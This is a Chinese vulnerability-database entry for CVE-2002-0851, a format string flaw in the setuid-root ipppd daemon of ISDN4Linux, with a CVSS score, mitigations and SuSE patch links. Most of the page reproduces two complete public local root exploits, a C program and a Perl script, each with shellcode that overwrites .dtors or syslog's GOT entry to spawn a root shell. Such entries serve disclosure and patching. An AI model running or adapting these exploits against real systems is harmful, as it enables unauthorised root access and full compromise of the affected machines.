CVE-2002-0851
CVSS7.2
发布时间 :2002-09-05 00:00:00
修订时间 :2008-09-05 16:29:07
NMCOE    

[原文]Format string vulnerability in ISDN Point to Point Protocol (PPP) daemon (ipppd) in the ISDN4Linux (i4l) package allows local users to gain root privileges via format strings in the device name command line argument, which is not properly handled in a call to syslog.


[CNNVD]ISDN4Linux ipppd 设备名本地格式串溢出漏洞(CNNVD-200209-010)

        
        isdn4linux是一款免费开放源代码ISDN实现,包含多个程序用于ISDN维护和连接,可使用在Linux操作系统下。
        isdn4linux的ippd程序对传递个syslog函数的参数缺少检查,本地攻击者可以利用这个漏洞进行格式字符串攻击并获取root权限。
        ipppd程序默认以SETUID ROOT属性进行安装,并只允许'dialout'组的用户执行。由于将用户输入的无效设备名错误地作为格式串传递给syslog函数,本地攻击者可以提交恶意格式字符串作为参数而导致重写ipppd进程任意内存数据,精心构建提交数据可以以ROOT权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0851
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0851
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-010
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5437
(VENDOR_ADVISORY)  BID  5437
http://www.iss.net/security_center/static/9811.php
(VENDOR_ADVISORY)  XF  isdn4linux-ipppd-format-string(9811)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0068.html
(VENDOR_ADVISORY)  VULNWATCH  20020809 Local Root Exploit

- 漏洞信息

ISDN4Linux ipppd 设备名本地格式串溢出漏洞
高危 未知
2002-09-05 00:00:00 2005-05-02 00:00:00
本地  
        
        isdn4linux是一款免费开放源代码ISDN实现,包含多个程序用于ISDN维护和连接,可使用在Linux操作系统下。
        isdn4linux的ippd程序对传递个syslog函数的参数缺少检查,本地攻击者可以利用这个漏洞进行格式字符串攻击并获取root权限。
        ipppd程序默认以SETUID ROOT属性进行安装,并只允许'dialout'组的用户执行。由于将用户输入的无效设备名错误地作为格式串传递给syslog函数,本地攻击者可以提交恶意格式字符串作为参数而导致重写ipppd进程任意内存数据,精心构建提交数据可以以ROOT权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 取消ipppd的suid root权限。
         # chmod u-s /usr/sbin/ipppd
        * 只允许可信任用户在dialout组中。
        厂商补丁:
        S.u.S.E.
        --------
        S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2002:030)以及相应补丁:
        SuSE-SA:2002:030:i4l
        链接:
        http://www.suse.com/de/support/security/2002_030_i4l.html

        补丁下载:
        i386 Intel Platform:
        SuSE-8.0
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/i4l-2002.7.31-0.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/i4l-2002.7.31-0.src.rpm
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/i4l-2002.7.23-0.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
        Sparc Platform:
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/i4l-2002.7.23-0.sparc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
        PPC Power PC Platform:
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/i4l-2002.7.23-0.ppc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
        补丁安装方法:
        用"rpm -Fhv file.rpm"命令安装文件。

- 漏洞信息 (21700)

ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (1) (EDBID:21700)
linux local
2002-08-10 Verified
0 Gobbles Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/5437/info

isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems.

isdn4linux contains a format string vulnerability in the ipppd utility. In some installations, this utility is installed with setuid root privileges. Exploitation of this vulnerability could lead to a local attacker executing code with administrative privileges.

/*
 * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
 *
 * Random Defcon Quote:
 *  "Who hired Gary Coleman to play KF at defcon?"
 *   -Anonymous
 *
 * ipppd is part of the isdn4linux-utils package and
 * is part of the default install of many linux dists.
 *
 * It is installed suid root on suse 8.0 but can only
 * be run by users in group "dialout". Luckily this
 * is a default group that normal users get added to.
 *
 * Problem:
 *
 * Classical syslog(3) formatstring problem.
 *
 * ipppd will log device strings in the following manner:
 *
 * main.c:
 *
 * ...
 * syslog(LOG_NOTICE,devstr);  // HARD TO SPOT BUG
 * ...
 *
 * This code is normally only reached with a valid device string
 * but if you feed ipppd a devicename that is >= 256 bytes it
 * will merrily proceed to log this string using the faulty
 * syslog(3) call. Subsequently handing over root access to the machine.
 *
 *     GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
 *
 * We're surprised that format bugs are allowed in 7350linux, but no one
 * is perfect.  Finding format bugs is a difficult task, and should be left
 * to the professionals.  A little known fact -- Paul Vixie invented
 * insecure programming.  We wanted to get this bug squashed before some
 * "researcher" from snosoft.com discovered it and tried to make some money
 * off it.  Help us in our mission to eliminate the existance of format bugs
 * in code.
 *
 * Greets:
 *  -Mark Litchfield, for helping make defcon happen.  Thanks.
 *  -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
 *   Challenge (the finest moment of defcon X)
 *  -Dean Turner, who contrary to whatever might be said, GOBBLES is not
 *   afraid of.  http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
 *  -Eric Hines of f8labs.com, congradulations on your promotion to stockboy
 *   at Circuit City.
 *  -dice, for continuing to support the blackhat world (thanks for buying
 *   a turkey breakfast)
 *  -stealth, for making fun of the super bug.
 *  -Brian McWilliams, for thinking he knows what's up.  Hoser.
 *
 * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
 * have comprimised each and every one of those machines, and are rapidly
 * stealing other warez developed on these machines.  If you have also
 * worked with your perl -e techniques on these machines, and discovered some
 * locally exploitable stack overflows, your work may have been ripped off.
 * KF, the defcon stage, much like information security, is not for you.
 *
 * Please, help liberate dvdman!  Let him go back to maintaining
 * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
 * skill displayed on l33tsecurity.com shows this man knows what's up and
 * deserves to make a little more money, or return to the wild where he
 * can hack freely.  FREE DVDMAN!@#!@#
 *
 * (flashn has asked that the "hack.se is a bunch of nazis" statement from
 *  the defcon speech to be publically retracted and for an apology to be
 *  issued)
 *
 */
/*
 * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
 *
 * $ ./GOBBLES-own-ipppd -t 0x806c864
 * [*] target @ 0x806c868
 * [*] shellcode @ 0xbfffffb5
 * sh-2.05# id
 * uid=0(root) gid=100(users) groups=100(users)
 * sh-2.05#
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define DPA             11
#define ALLIGN          3

#define IPPPD           "/usr/sbin/ipppd"
#define OBJDUMP         "/usr/bin/objdump"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[260];

int
main(int argc, char **argv)
{
        int dpa, aln, shift = 0;
        char opt, *tmp;
        unsigned long t, w;

        if(argc == 1) {
                fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
                                "Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
                                "For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
                                , argv[0]);
                exit(0);
        }

        aln = ALLIGN;
        dpa = DPA;

        while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
                switch(opt) {
                        case 't':
                                sscanf(optarg, "%p", &tmp);
                                t = (long)tmp;
                                t += 4;
                                break;
                        case 'a':
                                aln = atoi(optarg);
                                break;
                        case 'o':
                                dpa = atoi(optarg);
                                break;
                        case 'g':
                                fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
                                if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
                                        fprintf(stderr, "[*] error getting .dtors section, check paths\n");
                                        exit(1);
                                }
                        default:
                                fprintf(stderr, "hehehe ;PppPPPpP\n");
                                exit(0);
                }
        }

        tmp = NULL;

        if((tmp = getenv("GOBBLES")) == NULL) {
                stuff();
                if(execve(argv[0], argv, environ)) {
                        fprintf(stderr, "[*] error re-executing\n");
                        exit(1);
                }
        }

        w = (long)tmp;
        shift = (strlen(argv[0]) - strlen(IPPPD));
        w += shift;

        fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);

        buildstring(t, w, dpa, aln);

        if(execl(IPPPD, "ipppd", string, NULL)) {
                fprintf(stderr, "[*] error executing\n");
                exit(1);
        }
}


void
buildstring(unsigned long t, unsigned long w, int dpa, int aln)
{
        char a_buf[4];
        unsigned int un, deux, x, len, b[4];

        memset(string, '\0', sizeof(string));
        memset(a_buf, '\0', sizeof(a_buf));

        for(x = 0; x < aln && x < sizeof(a_buf); x++)
                a_buf[x] = 'x';

        b[0] = (t & 0x000000ff);
        b[1] = (t & 0x0000ff00) >> 8;
        b[2] = (t & 0x00ff0000) >> 16;
        b[3] = (t & 0xff000000) >> 24;

        un = (w >> 16) & 0xffff;
        deux = w & 0xffff;

        if(un < deux) {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + aln + 5), dpa,
                        deux - un, dpa + 1
                );
        }
        else {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3],
                        deux - (8 + aln + 5), dpa,
                        un - deux, dpa + 1
                );
        }

        len = strlen(string);
        memset(&string[len], 'x', (sizeof(string)-len-1));
}


void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
        "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
        "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";  // In honor of Snosoft
                                                 // appreciate week, we
                                                 // too are using only
                                                 // Taeho Oh shellcode.
        setenv("GOBBLES", code, 1);
}		

- 漏洞信息 (21701)

ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (2) (EDBID:21701)
linux local
2002-08-10 Verified
0 TESO Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/5437/info
 
isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems.
 
isdn4linux contains a format string vulnerability in the ipppd utility. In some installations, this utility is installed with setuid root privileges. Exploitation of this vulnerability could lead to a local attacker executing code with administrative privileges.

#!/usr/bin/perl

# 7350pippi - x86/Linux ipppd local root
#
# (C) COPYRIGHT TESO Security, 2002
# All Rights Reserved
#
# May be used under the terms of the GPL.

# ipppd local root exploit:
# ... 
#    /*
#     * Check if there is a device by this name.
#     */
#    if (stat(cp, &statbuf) < 0) {
#        if (errno == ENOENT)
#            return 0;
#        syslog(LOG_ERR, cp);
#        return -1;
#    }
# ...
# 
# This exploit changes the address of syslog in ipppd's
# GOT. Since it returns -1 as seen above, ipppd will invoke
# syslog() a second time soon this time using the address
# given by us. We redirect the GOT entry to a stacklocation
# where the filename of the executed program is normally
# located. Since we symlink() the shellcode to /usr/sbin/ipppd
# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
# we avoid ugly offsets and guessing/bruteforce.
# If porting this exploits to other systems, you
# need to find syslogs() GOT entry yourself.
#

use Fcntl;

# chown()+chmod() /tmp/boomsh
$shellcode = "\x90"x100 .
"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
"\x6d\x73\x68\x2e";

unlink("/tmp/$shellcode");
symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";

# my syslog GOT entry @ 0x806c90c

sysopen(O, "/tmp/boomsh.c", O_RDWR|O_CREAT, 0600) or die "$!";
print O<<_EOF_;
#include <stdio.h>
int main()
{
        char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};

        setuid(0);
        execve(*a, a, NULL);
        return -1;
}
_EOF_
close O;

print "Compiling boomshell ...\n";
system("cc /tmp/boomsh.c -o /tmp/boomsh");

$dir = "/tmp/L";
mkdir($dir);

$ret = 0xbffffffb - length($shellcode)+20;
printf("Filename is located @ %x\n", $ret);


# maybe need to change to your GOT entry
# of syslog(); see above
$file = "XX" . 	pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
		pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
		pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
		pack(c4, 0x0f, 0xc9, 0x06, 0x08); 	    # GOT+3
		
$stackpop = "%p"x11;
$file .= $stackpop;

#$file .= "%14d%n%69d%n%40d%n%192d%n";

# Should be fixed. If not, find the 4 values for
# %d yourself using gdb. This worked for me.
$file .= "%221d%n%158d%n%256d%n%192d%n";

open(O, ">$dir/$file") or die "$!";
close O;

system("/tmp/$shellcode", "..$dir/$file/");

exec("/tmp/boomsh");

		

- 漏洞信息

5067
ISDN4Linux ipppd Local Format String Privilege Escalation
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-08-10 Unknow
2002-08-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站